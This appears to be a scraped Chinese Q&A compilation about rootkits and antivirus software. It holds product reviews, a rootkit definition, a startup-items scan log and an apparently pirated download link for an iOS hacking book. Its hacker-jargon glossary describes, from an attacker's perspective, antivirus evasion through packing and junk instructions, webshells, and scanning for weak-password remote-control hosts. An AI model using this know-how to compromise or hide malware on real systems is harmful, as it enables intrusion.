rootkitpdf

1. 什麼品牌的殺毒軟體最好拜託各位了 3Q

江民殺毒軟體KV2010系江民反病毒資深研發團隊歷時一年之久，悉心打造的一款新型全功能殺毒軟體。採用全新動態啟發式殺毒引擎，融入指紋加速功能，殺毒功能更強、速度更快。KV2010也是國內首家完美兼容微軟WINDOWS7操作系統的2010版殺毒軟體。 KV2010顛覆了傳統的防殺毒模式，在智能主動防禦、「沙盒技術」、內核級自我保護、虛擬機脫殼、雲安全防毒系統、啟發式掃描等領先的核心殺毒技術基礎上，創新「前置威脅預控」安全模式，在防殺病毒前預先對系統進行全方位安全檢測和防護，檢測三大類29項可能存在的安全潛在威脅，提供安全加固和解決方案。 功能亮點: 一、全新引擎，動態啟發式殺毒，指紋加速，殺毒更快、更強。 KV2010採用全新動態啟發式引擎，採用動態啟發和靜態啟發相結合的方式掃描未知病毒，提高了對未知病毒的啟發識別能力；掃描時採用了指紋加速技術，在首次掃描後的正常文件中加入指紋識別功能，下次再掃描時忽略不掃，大大加快了掃描速度和效率。 二、29項安全防護，封堵所有病毒入侵通道，病毒無隙可入。 新增「江民安全專家」，在防殺病毒前預先對系統進行全方位安全檢測和防護，檢測三大類29項可能存在的安全潛在威脅，提供安全加固和解決方案。 1、病毒入侵的防禦能力： 分析所有的病毒入口，檢測這些入口是否有相應的安全防護並提供加固方案，這些病毒入口分別為：網頁、郵件、移動U盤、網路下載、WINDOWS和第三方軟體漏洞、網路共享、藍牙等十餘種病毒入侵通道。 2、病毒入侵的抵卸能力。 分析病毒入侵後，系統是否具有相應的抵卸能力：當病毒向外發送重要系統信息時，系統是否開啟主動防禦和隱私保護功能並提供解決方案；當病毒試圖永久駐留硬碟時，系統是否開啟文件監視功能；病毒入侵後試圖偷取銀行、網游帳號密碼時，是否具有密碼保護功能並提供解決方案；當病毒試圖在線好友發送帶毒網址時，是否開啟即時通訊監視功能；檢測是否具有僵屍網路程序的防護功能，防止黑客抓取「肉雞」；反病毒隱身術，是否具有對Rootkit病毒的檢測和防護功能，並提供解決方案；對具有反殺毒軟體能力的病毒的防護，檢測是否開啟殺毒軟體的自我保護功能，並提供加固或解決方案。 3、檢測系統本地安全指數。檢測病毒庫更新情況，最後一次殺毒的時間，系統需要修復的項；流行木馬掃描、未知病毒掃描，並提供加固或解決方案。 三、24小時監控網頁掛馬，惡意網址動態入庫，網路暢游無憂。 江民惡意網頁監控系統24小時不間斷監控全國網頁掛馬情況，提取被掛馬的惡意網址，並動態加入到殺毒軟體惡意網址庫，及時有效屏蔽惡意網址，這樣，即使用戶不小心點擊到惡意網頁，也可以有效阻擋病毒於系統之外。 四、增強智能主動防禦沙盒模式，增強虛擬機脫殼，未知病毒剋星。 採用沙盒模式的智能主動防禦，能夠接管未知病毒的所有可疑動作，在確認為系病毒行為後執行回滾操作，徹底消除病毒留下的所有痕跡。 增強虛擬機脫殼技術，能夠對各種主流殼以及疑難的「花指令殼」、「生僻殼」病毒進行脫殼掃描。 五、全新三層防火牆，從應用層、協議層、內核層三層防範黑客攻擊。 全新江民三層防火牆，實時監控網路數據流，創新三層規則防範黑客，將傳統防火牆從應用層、協議層兩層黑客防範，擴展至系統內核層三層防範。應用層防黑客利用系統、第三方軟體漏洞遠程攻擊，協議層防範基於各種網路協議的異常數據攻擊（如DDOS），預先設置上百種安全規則，避免各種來自網路的異常掃描、嗅探、入侵、開啟後門，網路包捕獲監視和處理埠異常數據包，確保網路暢通。 內核層監視並防範異常惡意驅動程序調用API，發現有異常行為即報警並阻斷動作，避免黑客利用底層驅動繞開防火牆的阻攔，入侵或遠程式控制制目標電腦。 六、增強雲安全防毒系統，海量可疑文件數據處理中心，搜集病毒樣本更多，升級速度更快。 能夠監測並捕獲更多的可疑文件或病毒樣本，江民病毒自動分析系統自動分析可疑文件並自動入庫，數據處理能力更強大，病毒庫更新速度更快。 七、增強網頁防馬牆功能，動態更新網頁掛馬規則庫。 基於木馬行為規則的江民網頁防馬牆，能夠監控和阻斷更多的未知惡意網頁和木馬入侵，網頁掛馬規則庫動態更新，與惡意網址庫構成對惡意網頁的雙重安全保障，確保用戶安全瀏覽網頁。 八、增強系統漏洞管理功能，自動掃描、修復系統漏洞，新增第三方軟體漏洞掃描、自動修復功能。 系統漏洞管理功能能夠自動掃描、修復微軟操作系統以及OFFICE漏洞，新增第三方軟體漏洞掃描和自動修復，可以自動修復Flash、RealPlayer、Adobe pdf等黑客常用的第三方軟體漏洞，避免病毒通過漏洞入侵電腦。 九、江民新電腦保護系統，系統災難一鍵恢復，恢復系統到正常狀態。 江民新電腦保護系統，在系統遇到病毒、誤操作等災難事件導致系統崩潰時，可以一鍵恢復系統至事故前正常狀態，為用戶電腦安全設下最後一道安全屏障。 十、病毒掃描、查殺速度更快 為了大幅提升掃描速度，KV2010創新了四大掃描加速技術，指紋加速掃描，超線程掃描技術，創新哈希（Hash）定位技術，精準判定病毒位置，新增流行木馬「秒殺」技術，迅速清除流行木馬及其變種（內置於江民安全專家內）。 十一、佔用系統資源更少、防殺病毒效率更高 KV2010採用四大技術，減少系統資源佔用，在確保殺毒和防禦效果的前提下，給用戶最好的使用體驗。創新病毒庫動態載入技術，智能讀取病毒庫，減少資源佔用；殺毒模塊智能連接技術，減少中間環節，降低資源佔用；採用智能內存分配技術，充分提高內存使用效率，自動平衡ＣＰＵ佔用，消除系統各種「卡」「滯」現象

2. 請問殺毒專家崔衍渠先生。

NOD32防病毒系統 2.7 & 0utpost Firewall Pro 3.51
世界一流的防病毒技術
在全球的防病毒 產品當中，不論是資歷還是獲得的大獎數量，NOD32都足可以位居前列。NOD32反病毒引擎從技術角度來說幾乎是無可挑剔的，這使其成為技術型防病毒軟 件的典型代表之一。NOD32引擎所最為人稱道的性能表現，在我們的測試中得到充分的展現。不超過三十分鍾的海量文件掃描測試成績是所有產品當中最好的一 個，不過與其它產品的距離並不是特別明顯，事實上在處理海量的體積很小的文件時NOD32並沒有絕對的性能優勢。在安裝了NOD32之後其實時監控程序可 以說對系統"毫無影響"。
即使我們運行很 多大型的應用軟體，NOD32的病毒檢測操作還是絲毫不會降低系統運行速度。未知病毒檢測是NOD32反病毒引擎中最具技術含量的部分，也是相比很多產品 的最大優勢。在實際測試當中，NOD32成功的發現了我們的未知游戲木馬樣本，而絕大多數產品都無法作到這一點，這個結果在一定程度上證實了NOD32未 知病毒檢測引擎的能力。同樣值得關注的一點在於，NOD32還將另外三個樣本也識別為未知病毒，這三個樣本分別是ani病毒變種、盜取密碼的QQ木馬以及 魔獸世界木馬。從這一點可以看出，NOD32在檢測中國本土流行病毒方面還有待改進。除了防範未知病毒之外，NOD32集成的"反隱藏"技術專門用於檢測 潛藏在系統中的惡意軟體，特別是那些植入到系統底層的Rootkit。
小貼士： NOD32集成了很多頗具特色的功能，例如可以通過電子郵件和Windows信使服務傳遞警告消息，這通常是企業級防病毒軟體才具備的功能；另外， NOD32還能夠兼容企業版中的遠程遙控管理功能。NOD32的用戶可以從ThreatSense.Net預警系統中接受關於病毒傳播和發作的危險警告， 同時也可以將自己發現的可疑文件提交到ThreatSense.Net以幫助NOD32擴展病毒檢測范圍。
用戶介面的優點與缺點
NOD32的用 戶介面簡潔而明晰，實時監控、掃描、更新、日誌、設置等幾個主要的功能組在程序界面上分級而列，只有在點擊所需的功能之後，相關的界面才有在主窗體右側彈 出，直觀而且節省空間。不過從某種角度來說，NOD32在用戶界面和操作方面的設計過於貼近專業用戶了，初級用戶可能不太情願去記憶程序主界面上諸如 AMON、DMON、IMON、EMON這些實時監控程序的英文縮寫。
卡巴斯基互聯網安全套裝6.0個人版
速度表現略有不足
從只有十幾兆的 安裝程序就可以發現，卡巴斯基的程序結構是相當精簡的，實時監控程序在保證高效表現的基礎上，佔用的系統資源極低。一個值得關注的問題是，無論是啟動實時 保護功能還是文件掃描操作，卡巴斯基都會首先對內存中的對象進行檢測，這在很大程度上影響著卡巴斯基的性能表現。特別是啟動操作系統的時候，卡巴斯基對啟 動對象的檢測會令計算機在最初的幾分鍾里處於高資源佔用狀態。
出眾的反病毒引擎
如果翻開卡巴斯 基反病毒引擎的履歷，很多人可能會驚嘆到有如此之多的主流反病毒技術都是源自這個引擎的創造。在病毒檢測方面，卡巴斯基始終是最有競爭力的一個產品，本次 測試中的表現也是名列前茅。卡巴斯基在掃描文件的時候會深入地分析文件中的每個片斷，並有效的拆解加殼保護，這使得卡巴斯基可以更好的分析所掃描的文件是 否包含惡意代碼。由於應用了iChecker與iSwift技術，卡巴斯基可以忽略那些在上次掃描之後未改變過的文件，這可以在很大程度上提高掃描速度。 當啟用了相應的選項之後，卡巴斯基在第二次掃描測試所使用的目標分區時，掃描時間降低到了第一次掃描所用時間的不到百分之四十。在這個套件產品當中，卡巴 斯基擴展了自己的防護范圍，除了傳統意義上的計算機病毒之外，間諜軟體、木馬程序和駭客程序等類型的惡意軟體也是卡巴斯基檢測的重點。在發現這些威脅之 後，卡巴斯基會彈出警告窗口向用戶提供詳細的相關信息，並為用戶提供處理建議。
主動出擊對抗未知威脅
主動防禦技術是 卡巴斯基的亮點之一，盡管從很早開始卡巴斯基就集成了針對未知病毒的保護功能，但是在當前的套件產品中，無論是技術的成熟性還是保護的范圍都有了很大的提 升。基於對程序行為的分析，卡巴斯基可以發現一些利用舊有機制的惡意軟體，比如一個更改操作系統對象並向外網發送連接請求的軟體。對於經常使用微軟 Office套件的用戶來說，卡巴斯基不但集成了實時的病毒保護，而且其主動防禦機制還提供了一系列增強的保護機制，基於對宏操作的控制，卡巴斯基的用戶 在使用辦公文檔的時候可以減少很多擔憂。
盡管主動防禦機 制較慣常的基於威脅指紋的防護方式更加先進，但是必須特別關注這類機制的誤警問題。在使用卡巴斯基的過程中我們發現，主動防禦功能的反應似乎有些過分敏感 了，啟動一個安裝了Google工具條的IE瀏覽器也會觸發卡巴斯基的告警。由於主動防禦會將一些常用軟體的操作識別為威脅，用戶可能需要在使用過程中有 選擇地關閉一些主動防禦功能。
顯著增強的用戶介面
在進入6.0版 本之後，卡巴斯基的用戶介面設計有了很大的改善。在用戶操作層面，卡巴斯基更加快速、更加符合用戶直覺。統一而且排列規整的功能元素以及直觀易用的設置選 項，卡巴斯基與操作者的交互展現出很高的水準。例如，為非專業用戶群體根據威脅程度的高低，卡巴斯基的告警窗口會呈現出不同顏色，很多諸如此類的細節證明 卡巴斯基正開始在技術之外的層面取得巨大的進步。
防火牆智能高效
卡巴斯基的防火牆組件具有相當的智能性，可以自動識別計算機上安裝的網路應用程序並自動為其建立規則，在絕大部分情況下這些規則都是正確的。
也有一些常見的應用程序卡巴斯基沒有辦法識別，例如QQ 2007，卡巴斯基只發現了MSN程序而沒有自動為QQ生成規則。
在安裝的時候防 火牆組件就能夠檢測出計算機連接的網路，將本地網路設置為信任狀態，並自動將外部網路設置成"隱身模式"。在埠靜默測試中，即便是在默認的保護級別下， 1056個TCP埠也都處於隱秘模式，這意味著外網將很難從這台計算機獲取信息甚至無法發現這台計算機的存在。在阻止反彈式連接方面卡巴斯基的表現也相 當不錯，防火牆組件可以發現LeakTest和FirewallLeak建立的外向連接，而反病毒引擎內置的主動防禦功能則阻止了利用IE組件向外發起連 接的FireHole。
附加功能有待提升
卡巴斯基提供了基本的反垃圾郵件功能以及一組有針對性的反間諜軟體功能，對於互聯網上流行的網路釣魚、垃圾廣告信息、惡意撥號、金融信息竊取等安全威脅，卡巴斯基都能提供一定程度的保護。
卡巴斯基的反垃 圾郵件組件能夠與Outlook等常見的客戶端很好地集成，並基於用戶的需要組合特定的識別條件並設置權重值從而細致的設定識別規則。先進未必代表高效， 盡管卡巴斯基的反垃圾郵件功能集成了很多智能檢測技術，但是在實際使用過程中卡巴斯基的檢測比率並不理想。由於卡巴斯基的反垃圾郵件組件可以基於已經接收 和發出的郵件進行學習，隨著使用過程的延長，其檢測能力應該會有一定程度的改善。事實上，對於大部分附加防護功能來說，都要依賴於卡巴斯基自己的檢測能 力，用戶無法對其進行更多的設定和管理。 不過在這些略顯簡單的功能當中，卡巴斯基也展現出一些特色，例如可以設置特定的幾個電話號碼為可信任號碼，除此之外的其它號碼將無法在該計算機撥出。該功能對防範惡意的電話盜用和欺詐行為很有用處，特別式對於那些用於完成商業電話呼叫功能的計算機來說。

3. 黑客的專業術語

.肉雞：所謂「肉雞」是一種很形象的比喻，比喻那些可以隨意被我們控制的電腦，對方可以是WINDOWS系統，也可以是UNIX/LINUX系統，可以是普通的個人電腦，也可以是大型的伺服器，我們可以象操作自己的電腦那樣來操作它們，而不被對方所發覺。 2.木馬：就是那些表面上偽裝成了正常的程序，但是當這些被程序運行時，就會獲取系統的整個控制許可權。有很多黑客就是 熱中與使用木馬程序來控制別人的電腦，比如灰鴿子，黑洞，PcShare等等。 3.網頁木馬：表面上偽裝成普通的網頁文件或是將而已的代碼直接插入到正常的網頁文件中，當有人訪問時，網頁木馬就會利用對方系統或者瀏覽器的漏洞自動將配置好的木馬的服務端下載到訪問者的電腦上來自動執行。 4.掛馬：就是在別人的網站文件裡面放入網頁木馬或者是將代碼潛入到對方正常的網頁文件里，以使瀏覽者中馬。 5.後門：這是一種形象的比喻，入侵者在利用某些方法成功的控制了目標主機後，可以在對方的系統中植入特定的程序，或者是修改某些設置。這些改動表面上是很難被察覺的，但是入侵者卻可以使用相應的程序或者方法來輕易的與這台電腦建立連接，重新控制這台電腦，就好象是入侵者偷偷的配了一把主人房間的要是，可以隨時進出而不被主人發現一樣。 通常大多數的特洛伊木馬（Trojan Horse）程序都可以被入侵者用語製作後門（BackDoor） 6.rootkit：rootkit是攻擊者用來隱藏自己的行蹤和保留root（根許可權，可以理解成WINDOWS下的system或者管理員許可權）訪問許可權的工具。通常，攻擊者通過遠程攻擊的方式獲得root訪問許可權，或者是先使用密碼猜解（破解）的方式獲得對系統的普通訪問許可權，進入系統後，再通過，對方系統內存在的安全漏洞獲得系統的root許可權。然後，攻擊者就會在對方的系統中安裝rootkit，以達到自己長久控制對方的目的，rootkit與我們前邊提到的木馬和後門很類似，但遠比它們要隱蔽，黑客守衛者就是很典型的rootkit，還有國內的ntroorkit等都是不錯的rootkit工具。 7.IPC$：是共享「命名管道」的資源，它是為了讓進程間通信而開放的餓命名管道，可以通過驗證用戶名和密碼獲得相應的許可權，在遠程管理計算機和查看計算機的共享資源時使用。 8.弱口令：指那些強度不夠，容易被猜解的，類似123，abc這樣的口令（密碼） 9.默認共享：默認共享是WINDOWS2000/XP/2003系統開啟共享服務時自動開啟所有硬碟的共享，因為加了"$"符號，所以看不到共享的托手圖表，也成為隱藏共享。 10.shell：指的是一種命令指行環境，比如我們按下鍵盤上的「開始鍵+R」時出現「運行」對話框，在裡面輸入「cmd」會出現一個用於執行命令的黑窗口，這個就是WINDOWS的Shell執行環境。通常我們使用遠程溢出程序成功溢出遠程電腦後得到的那個用於執行系統命令的環境就是對方的shell 11.WebShell：WebShell就是以asp、php、jsp或者cgi等網頁文件形式存在的一種命令執行環境，也可以將其稱做是一種網頁後門。黑客在入侵了一個網站後，通常會將這些asp或php後門文件與網站伺服器WEB目錄下正常的網頁文件混在一起，好後就可以使用瀏覽器來訪問這些asp 或者php後門，得到一個命令執行環境，以達到控制網站伺服器的目的。可以上傳下載文件，查看資料庫，執行任意程序命令等。國內常用的WebShell有海陽ASP木馬，Phpspy，c99shell等 12.溢出：確切的講，應該是「緩沖區溢出」。簡單的解釋就是程序對接受的輸入數據沒有執行有效的檢測而導致錯誤，後果可能是造成程序崩潰或者是執行攻擊者的命令。大致可以分為兩類：（1）堆溢出；（2）棧溢出。 13.注入：隨著B/S模式應用開發的發展，使用這種模式編寫程序的程序員越來越來越多，但是由於程序員的水平參差不齊相當大一部分應用程序存在安全隱患。用戶可以提交一段資料庫查詢代碼，根據程序返回的結果，獲得某些他想要知的數據，這個就是所謂的SQLinjection，即：SQL注意入。 14.注入點：是可以實行注入的地方，通常是一個訪問資料庫的連接。根據注入點資料庫的運行帳號的許可權的不同，你所得到的許可權也不同。 15.內網：通俗的講就是區域網，比如網吧，校園網，公司內部網等都屬於此類。查看IP地址如果是在以下三個范圍之內的話，就說明我們是處於內網之中的：10.0.0.0—10.255.255.255，172.16.0.0—172.31.255.255，192.168.0.0—192.168.255.255 16.外網：直接連入INTERNET（互連網），可以與互連網上的任意一台電腦互相訪問，IP地址不是保留IP（內網）IP地址。 17.埠：（Port）相當於一種數據的傳輸通道。用於接受某些數據，然後傳輸給相應的服務，而電腦將這些數據處理後，再將相應的恢復通過開啟的埠傳給對方。一般每一個埠的開放的偶對應了相應的服務，要關閉這些埠只需要將對應的服務關閉就可以了。 18.3389、4899肉雞：3389是Windows終端服務（Terminal Services）所默認使用的埠號，該服務是微軟為了方便網路管理員遠程管理及維護伺服器而推出的，網路管理員可以使用遠程桌面連接到網路上任意一台開啟了終端服務的計算機上，成功登陸後就會象操作自己的電腦一樣來操作主機了。這和遠程式控制制軟體甚至是木馬程序實現的功能很相似，終端服務的連接非常穩定，而且任何殺毒軟體都不會查殺，所以也深受黑客喜愛。黑客在入侵了一台主機後，通常都會想辦法先添加一個屬於自己的後門帳號，然後再開啟對方的終端服務，這樣，自己就隨時可以使用終端服務來控制對方了，這樣的主機，通常就會被叫做3389肉雞。Radmin是一款非常優秀的遠程式控制制軟體，4899就是Radmin默認使用也經常被黑客當作木馬來使用（正是這個原因，目前的殺毒軟體也對Radmin查殺了）。有的人在使用的服務埠號。因為Radmin的控制功能非常強大，傳輸速度也比大多數木馬快，而且又不被殺毒軟體所查殺，所用Radmin管理遠程電腦時使用的是空口令或者是弱口令，黑客就可以使用一些軟體掃描網路上存在Radmin空口令或者弱口令的主機，然後就可以登陸上去遠程式控制制對惡劣，這樣被控制的主機通常就被成做4899肉雞。 19.免殺：就是通過加殼、加密、修改特徵碼、加花指令等等技術來修改程序，使其逃過殺毒軟體的查殺。 20.加殼：就是利用特殊的演算法，將EXE可執行程序或者DLL動態連接庫文件的編碼進行改變（比如實現壓縮、加密），以達到縮小文件體積或者加密程序編碼，甚至是躲過殺毒軟體查殺的目的。目前較常用的殼有UPX，ASPack、PePack、PECompact、UPack、免疫007、木馬綵衣等等。 21.花指令：就是幾句匯編指令，讓匯編語句進行一些跳轉，使得殺毒軟體不能正常的判斷病毒文件的構造。說通俗點就是」殺毒軟體是從頭到腳按順序來查找病毒。如果我們把病毒的頭和腳顛倒位置，殺毒軟體就找不到病毒了「。

4. 《黑客攻防技術寶典iOS實戰篇》pdf下載在線閱讀，求百度網盤雲資源

《黑客攻防技術寶典》（[美]Charlie Miller）電子書網盤下載免費在線閱讀

資源鏈接：

鏈接：https://pan..com/s/1Ahf1gIfNRnICCAZPJJZbkg

書名：黑客攻防技術寶典

作者：[美]Charlie Miller

譯者：傅爾也

出版社：人民郵電出版社

出版年份：2013-9

頁數：320

內容簡介：安全始終是計算機和互聯網領域最重要的話題。進入移動互聯網時代，移動平台和設備的安全問題更加突出。iOS系統憑借其在移動市場的佔有率擁有著舉足輕重的地位。雖然iOS系統向來以安全著稱，但由其自身漏洞而引發的威脅同樣一直存在。

《黑客攻防技術寶典：iOS實戰篇》由美國國家安全局全球網路漏洞攻擊分析師、連續4年Pwn2Own黑客競賽大獎得主Charlie Miller領銜，6位業內頂級專家合力打造，全面深入介紹了iOS的工作原理、安全架構、安全風險，揭秘了iOS越獄工作原理，探討了加密、代碼簽名、內存保護、沙盒機制、iPhone模糊測試、漏洞攻擊程序、ROP有效載荷、基帶攻擊等內容，為深入理解和保護iOS設備提供了足夠的知識與工具，是學習iOS設備工作原理、理解越獄和破解、開展iOS漏洞研究的重量級專著。

本書作為國內第一本全面介紹iOS漏洞及攻防的專著，作者陣容空前豪華，內容權威性毋庸置疑。Charlie Miller曾在美國國家安全局擔任全球網路漏洞攻擊分析師5年，並連續4屆摘得Pwn2Own黑客競賽桂冠。Dionysus Blazakis擅長漏洞攻擊緩解技術，2010年贏得了Pwnie Award最具創新研究獎。Dino Dai Zovi是Trail of Bits聯合創始人和首席技術官，有十餘年信息安全領域從業經驗，出版過兩部信息安全專著。Vincenzo Iozzo現任BlackHat和Shakacon安全會議評審委員會委員，因2010年和2011年連續兩屆獲得Pwn2Own比賽大獎在信息安全領域名聲大振。Stefan Esser是業界知名的PHP安全問題專家，是從原廠XBOX的硬碟上直接引導Linux成功的第一人。Ralf-Philipp Weinmann作為德國達姆施塔特工業大學密碼學博士、盧森堡大學博士後研究員，對密碼學、移動設備安全等都有深入研究。

本書適合想了解iOS設備工作原理的人，適合對越獄和破解感興趣的人，適合關注iOS應用及數據安全的開發人員，適合公司技術管理人員（他們需要了解如何保障iOS設備安全），還適合從事iOS漏洞研究的安全研究人員。

作者簡介：Charlie Miller

Accuvant Labs首席研究顧問，曾在美國國家安全局擔任全球網路漏洞攻擊分析師5年，連續4年贏得CanSecWest Pwn2Own黑客大賽。他發現了iPhone與G1安卓手機第一個公開的遠程漏洞，通過簡訊對iPhone進行漏洞攻擊並發現了可以讓惡意軟體進入iOS的代碼簽名機制缺陷。作為聖母大學博士的他還與人合著了The Mac Hacker's Handbook和Fuzzing for Software Security Testing and Quality Assurance兩本信息安全類圖書。

Dionysus Blazakis

程序員和安全研究人員，擅長漏洞攻擊緩解技術，經常在安全會議上發表有關漏洞攻擊緩解技術、繞過緩解技術和尋找漏洞的新方法等主題演講，因利用即時編譯器繞過數據執行保護的技術贏得了2010年Pwnie Award最具創新研究獎。另外，他與Charlie Miller為參加2011年Pwn2Own大賽開發的iOS漏洞攻擊程序贏得了iPhone漏洞攻擊比賽的大獎。

Dino Dai Zovi

Trail of Bits聯合創始人和首席技術官，有十餘年信息安全領域從業經驗，

做過紅隊（red teaming，又稱「倫理黑客」）、滲透測試、軟體安全、信息安全管理和網路安全研究與開發等多種工作。Dino是信息安全會議的常客，在DEFCON、BlackHat和CanSecWest等世界知名的信息安全會議上發表過對內存損壞利用技術、802.11無線客戶端攻擊和英特爾VT-x虛擬化rootkit程序等課題的獨立研究成果。他還是The Mac Hacker's Handbook和The Art of Software Security Testing的合著者。

Vincenzo Iozzo

Tiqad srl安全研究人員，BlackHat和Shakacon安全會議評審委員會成員，常在BlackHat和CanSecWest等信息安全會議上發表演講。他與人合作為BlackBerryOS和iPhoneOS編寫了漏洞攻擊程序，因2010年和2011年連續兩屆獲得Pwn2Own比賽大獎在信息安全領域名聲大振。

Stefan Esser

因在PHP安全方面的造詣為人熟知，2002年成為PHP核心開發者以來主要關注PHP和PHP應用程序漏洞的研究，早期發表過很多關於CVS、Samba、OpenBSD或Internet Explorer等軟體中漏洞的報告。2003年他利用了XBOX字體載入器中存在的緩沖區溢出漏洞，成為從原廠XBOX的硬碟上直接引導Linux成功的第一人；2004年成立Hardened-PHP項目，旨在開發更安全的PHP，也就是Hardened-PHP（2006年融入Suhosin PHP安全系統）；2007年與人合辦德國Web應用開發公司SektionEins GmbH並負責研發工作；2010年起積極研究iOS安全問題，並在2011年提供了一個用於越獄的漏洞攻擊程序（曾在蘋果多次更新後倖存下來）。

Ralf-Philipp Weinmann

德國達姆施塔特工業大學密碼學博士、盧森堡大學博士後研究員。他在信息安全方面的研究方向眾多，涉及密碼學、移動設備安全等很多主題。讓他聲名遠播的事跡包括參與讓WEP破解劇烈提速的項目、分析蘋果的FileVault加密、擅長逆向工程技術、攻破DECT中的專屬加密演算法，以及成功通過智能手機的Web瀏覽器（Pwn2Own）和GSM協議棧進行滲透攻擊。

5. 免費殺軟

AVg比較好

AVG免費版是一款廣受Windows用戶歡迎的反病毒程序，它可以為用戶提供反病毒、反間諜軟體、反惡意軟體等的安全防護功能。
概況

反病毒程序可以幫助我們的電腦防禦木馬，病毒，間諜軟體，廣告軟體，rootkit，僵屍網路，蠕蟲，漏洞威脅，流氓程序，以及威脅隱私安全的潛在威脅軟體。那麼AVG免費版在防禦在流行的已知病毒方面究竟怎樣呢？

AVG免費版具備有限的安全功能。AVG免費版可以防禦病毒，蠕蟲和間諜軟體的威脅。AVG免費版提供的LinkScanner功能有效地攔截惡意站點。不過，AVG免費版無法防禦欺騙站點，並且不提供rootkit防護功能。

AVG免費版支持Windows 7, Vista, XP和Windows 2000系統平台，而且LinkScanner兼容IE和Firefox瀏覽器。
在Windows 系統中，AVG免費版的設置非常簡單。AVG在Vista中安裝需要59 MB空間，在Windows XP中安裝僅需57.26 MB空間。安裝時，用戶可以根據自己的需要選擇是否安裝AVG安全工具。

AVG的用戶界面簡潔。AVG的基本導航菜單位於窗口左側，詳細的導航是通過頂部的導航菜單。概述選項顯示了所有的組件及狀態。雙擊任何一個組件，主界面就會顯示更多的信息。

AVG通過內置更新工具對其病毒庫進行日常更新。值得一提的是，AVG更新工具還可以在下載或安裝程序之前，提供程序更新信息。

處於閑置狀態時，AVG的內存佔用為5 MB（掃描時佔用更多內存）。AVG免費版不提供快速掃描服務。AVG免費版還允許用戶在Windows安全模式下運行命令行掃描。
性能

AVG的常駐保護盾（Resident Shield）在防禦惡意文件方面略顯不足。在對比AntiVir（小紅傘）、Avast和微軟Microsoft Security Essential的測試中，AVG並沒有實時攔截惡意文件。用戶必須打開包含惡意文件的文件夾，等待常駐保護盾檢測威脅。

AVG的手動掃描可用於惡意軟體掃描，但其檢測率要低於90%。

LinkScanner和常駐保護盾都不是非常有效。當訪問一些惡意站點或垃圾站點，以及進行一些不安全下載時，AVG免費版只能攔截6/18的意站點或不安全下載。總體而言，AVG免費版只能攔截一些低危威脅，無法攔截的高危威脅包括：

Alureon木馬

SpyEye 木馬

Kolab 蠕蟲

Banker 木馬

Mario Fev蠕蟲

TDSS rootkit

Koobface蠕蟲

Registry Easy 網站, 虛假注冊表清理軟體

Antivirus Soft, 流氓殺毒軟體

PDF 漏洞

SWF漏洞

6. rootkit病毒什麽意思

Rootkit是指其主要功能為隱藏其他程式進程的軟體，可能是一個或一個以上的軟體組合。
廣義而言，Rootkit也可視為一項技術。最早Rootkit用於善意用途，但後來Rootkit也被黑客用在入侵和攻擊他人的電腦系統上，電腦病毒、間諜軟體等也常使用Rootkit來隱藏蹤跡，因此Rootkit已被大多數的防毒軟體歸類為具危害性的惡意軟體。
Linux、Windows、Mac OS等操作系統都有機會成為Rootkit的受害目標。

7. 誰有這《矛與盾：黑客攻防命令大曝光》個和《黑客免殺攻防》這兩本書pdf，求下載鏈接！謝謝！

我可以給你黑客攻防

8. 卡巴斯基頻繁報告已檢測到: 風險軟體 Hidden object

我是樓主，附件在這里。
檢測報告

[CODE]

2007-03-03,12:09:40

System Repair Engineer 2.3.13.690
Smallfrogs (http://www.KZTechs.com)

Windows XP Professional Service Pack 2 (Build 2600)
- 管理許可權用戶 - 完整功能

以下內容被選中：
所有的啟動項目（包括注冊表、啟動文件夾、服務等）
瀏覽器載入項
正在運行的進程（包括進程模塊信息）
文件關聯
Winsock 提供者
Autorun.inf
HOSTS 文件

啟動項目
注冊表
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
<ctfmon.exe><C:\WINDOWS\system32\ctfmon.exe> [(Verified)Microsoft Corporation]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<SoundMan><SOUNDMAN.EXE> [(Verified)Realtek Semiconctor Corp.]
<ATIPTA><C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe> [ATI Technologies, Inc.]
<SMSERIAL><sm56hlpr.exe> [Motorola Inc.]
<EPSON Stylus C41 Series><C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_S10IC2.EXE /P23 "EPSON Stylus C41 Series" /O5 "LPT1:" /M "Stylus C41"> [SEIKO EPSON CORPORATION]
<kav><"F:\Kaspersky Lab\Kaspersky Anti-Virus 6.0\avp.exe"> [Kaspersky Lab]
<360Safetray><D:\360safe\safemon\360tray.exe /start> [奇虎網]
<StormCodec_Helper><"f:\Ringz Studio\Storm Codec\StormSet.exe" /S /opti> [N/A]
<TkBellExe><"C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot> [(Verified)RealNetworks, Inc.]
<UnlockerAssistant><"f:\Unlocker\UnlockerAssistant.exe"> [N/A]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
<shell><Explorer.exe> [(Verified)Microsoft Corporation]
<Userinit><C:\WINDOWS\system32\userinit.exe,> [(Verified)Microsoft Corporation]
<UIHost><"\Program Files\Logonui\Royale.exe"> [N/A]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\klogon]
<WinlogonNotify: klogon><C:\WINDOWS\system32\klogon.dll> [Kaspersky Lab]

==================================
啟動文件夾
N/A

==================================
服務
[Adobe LM Service / Adobe LM Service][Stopped/Manual Start]
<"C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe"><Adobe Systems>
[Ati HotKey Poller / Ati HotKey Poller][Running/Auto Start]
<C:\WINDOWS\system32\Ati2evxx.exe><N/A>
[ATI Smart / ATI Smart][Stopped/Auto Start]
<C:\WINDOWS\system32\ati2sgag.exe><>
[卡巴斯基反病毒6.0 / AVP][Running/Auto Start]
<"F:\Kaspersky Lab\Kaspersky Anti-Virus 6.0\avp.exe" -r><Kaspersky Lab>
[EPSON Printer Status Agent2 / EPSONStatusAgent2][Running/Auto Start]
<C:\Program Files\Common Files\EPSON\EBAPI\SAgent2.exe><SEIKO EPSON CORPORATION>
[Human Interface Device Access / HidServ][Stopped/Disabled]
<C:\WINDOWS\System32\svchost.exe -k netsvcs-->%SystemRoot%\System32\hidserv.dll><N/A>
[Kingsoft Personal Firewall Service / KPfwSvc][Stopped/Auto Start]
<"f:\KAV2007\KPfwSvc.EXE"><N/A>
[Kingsoft Antivirus KWatch Service / KWatchSvc][Stopped/Auto Start]
